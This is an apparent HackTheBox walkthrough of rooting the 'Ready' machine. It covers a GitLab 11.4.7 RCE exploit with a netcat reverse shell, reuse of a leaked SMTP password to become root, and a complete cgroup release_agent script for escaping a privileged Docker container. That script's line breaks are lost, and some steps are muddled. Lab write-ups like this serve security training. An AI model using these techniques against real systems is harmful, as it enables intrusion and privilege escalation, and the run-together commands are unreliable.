Ready HackTheBox WalkThrough
This is Ready HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted to Ready HTB
machine. Before starting let us know something about this machine. It is a Linux
box with IP address 10.10.10.220
and difficulty medium
assigned by its maker. First of all, connect your PC with HackTheBox VPN
and make sure your connectivity with Ready machine by pinging its IP 10.10.10.220
. If all goes correct then start hacking.
As usual, I started by scanning
the machine. Used Nmap
(a port scanner) for this task and the result is below-
Scanning
$ nmap -sC -sV -oN ready.nmap 10.10.10.220
Nmap revealed ports 22
and 5080
as open. OpenSSH
on port 22 and nginx
web server on port 5080 are running. Port 22 is useless for now because we don’t have any credential to log in so leave this port and move further for enumeration on port 5080. But wait, OpenSSH banner
revealed that the host Operating System
is Ubuntu 4
and Ubuntu 4 was released in 2004
. So if nmap is correct then we would have a large number of Kernel Exploits
available to get root to this machine after we will get into it. But I am not sure whether nmap is correct. We will dig deeper when we will be inside the ready
machine. For now let us enumerate on port 5080.
Nmap script http-title
revealed GitLab
on port 5080. So the webserver at port 5080 is using GitLab to host Git repository. GitLab
is same as GitHub
and is used to host git repository. After going to the URL http://10.10.10.220:5080 redirected to http://10.10.10.220:5080/users/sign_in. There is a register
option so immediately I registered with some fake credentials
. After login into this site, found the exact version of this GitLab
at URL http://10.10.10.220:5080/help. The installed version is GitLab Community Edition 11.4.7
and a message update asap
also present there.
Normally, if you see such type of message then there is clear cut information that this web application will be affected with severe security vulnerability. That’s why it is written asap.
After searching GitLab Community Edition 11.4.7 exploit
over internet found very first link on exploit-db
which revealed that it is effected with RCE vulnerability
and proof-of-concept is also present in this exploit. For more info about this exploit check here. According this exploit to use this, we require some additional parameters. They are authenticity_token
, authenticated cookies
, username
, localport
, and localip
.
To get authenticated_token
and authenticated cookies
follow the given steps.
Creating New Project
1. Login to GitLab and click on New project to create new project.
2. Under Import project
, choose git Repo by URL
as a source to import project from and fill something like this
Git repository URL: https://127.0.0.1/localhost.git
Project name: New Project
Project Slug: localhost
, and leave all other fields default.
3. Click on Create Project and capture the request in Burpsuite. The request will look something like this.
4. Select the authenticity_token
and URL decode
it by pressing CTRL+SHFT+U
.
5. Now copy the decoded authenticity_token
and _gitlab_session
to the exploit code. The final modified exploit code snippet
will look something like this. Now we are all done just start netcat
on port 1234 in one window and in other window run the exploit.
Getting User Shell
$ rlwrap nc -nvlp 1234
$ python3 49257.py
We have got user shell. Upgrade the shell to fully qualified Linux shell so that we can run more advanced Linux command through it.
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
$ ^Z
# Press CTRL+Z to background the shell
$ stty raw -echo
$ fg
# And press two times enter to foreground the shell
Let us capture user flag.
Capture User Flag
$ cat /home/dude/user.txt
Privilege Escalation
After some enumeration found a file gitlab.rb
inside the directory /opt/backup/
and this file contains password of SMTP user. The password is wW59U!ZKMbG9+*#h
. This password will be useful for us if it will be used by some other user like root.
$ cat /opt/backup/gitlab.rb | grep smtp
When I used this password to switch to user root I could easily switch.
Switching to User Root
$ su root
~wW59U!ZKMbG9+*#h
# whoami && id
But when I tried to capture root flag root.txt
it is not present inside root home directory. After some more enumeration and googling found that this is a privileged docker container
and it can be escaped
to get root flag and even you can access any file which is owned by root user by escaping it. For more info check this wonderful article on escaping privileged docker container.
So to get root flag follow the given steps. I have created a bash script to escape the container
and to get root flag. You can also run each command one by one or simply run the whole script on ready
machine.
Capture Root Flag
#!/bin/shmkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrpmkdir /tmp/cgrp/xecho 1 > /tmp/cgrp/x/notify_on_releasehost_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`echo "$host_path/cmd" > /tmp/cgrp/release_agentecho '#!/bin/sh' > /cmdecho "cat /root/root.txt > $host_path/output" >> /cmdchmod a+x /cmdsh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"cat /output
On Kali Machine
$ cat root_flag.sh
$ sudo python3 -m http.server 80
On Ready Machine
# cat /dev/shm
This was how I rooted to Ready HackTheBox machine. Learnt a lot after rooting this box. Hope you have also learnt some new things from this box walkthrough. Thanks for reading this. For any query and suggestion feel free to ping us at [email protected].